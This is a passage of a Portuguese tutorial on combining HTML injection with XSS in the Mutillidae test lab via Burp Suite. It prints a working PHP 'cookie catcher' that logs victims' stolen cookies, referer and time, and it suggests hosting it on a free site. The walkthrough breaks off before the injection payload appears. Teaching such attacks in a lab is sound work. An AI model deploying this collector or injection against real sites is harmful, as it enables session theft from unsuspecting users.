O que é HTML injection? É um tipo de ataque que utiliza códigos HTML para injetar scripts, que serão executados de acordo com o objetivo de quem injeta. Neste caso, iremos redirecionar o usuário que acessará nosso link para uma outra página de nossa escolha, que irá roubar seus cookies.
Ou seja, utilizaremos ainda outra vulnerabilidade em conjunto com o HTML injection, que será o Cross Site Scripting (XSS). A vulnerabilidade Utilizaremos o ambiente de testes Mutillidae para testarmos essa vulnerabilidade. O Burp
Suite será usado para testá­la, e iremos utilizar também uma página instalada localmente, chamada “cookie_catcher.php” (que você poderia fazer o upload em qualquer site de host grátis que se encontra na internet). Iremos testar a página “Add to your blog” do Mutillidae. Aqui está o arquivo cookie_catcher.php: <?php
$cookie = $_GET['c'];
$date=date("j F, Y, g:i a");;
$referer = getenv('HTTP_REFERER');
$fp = fopen('cookies.php', 'a'); fwrite($fp, 'Cookie: '.$cookie.'<br /> IP: '.$ip. '<br /> Date and time: ' .$date.'<br /> Referer: '
.$referer.'<br /><br />'); fclose($fp); header ("javascript:history.back()");
?>

Tutorial Primeiro utilize o Burp Suite como seu proxy, desligue a interceptação por enquanto. Agora, acesse a página “Add to your blog”, do Mutillidae:

Escreva qualquer coisa na caixa de texto e salve. Observe que há um registro de tudo o que você escreve:

Salve novamente uma outra mensagem, mas dessa vez com o interceptador do Burp ligado:

Deve aparecer algo assim:

Envie isso ao Repeater e aperte Go. Busque a palavra Teste2, e verá que você tem dois registros: um que você escreveu na primeira vez, e outro que você re­enviou com o

Repeater:

Nossa palavra está dentro de uma tabela HTML. Vamos testar agora, novamente, o que ocorre se a tag for fechada a partir do texto que enviamos, também temos que “fechar” a outra tag que sobrou ao lado:

Clique em “Go” e veja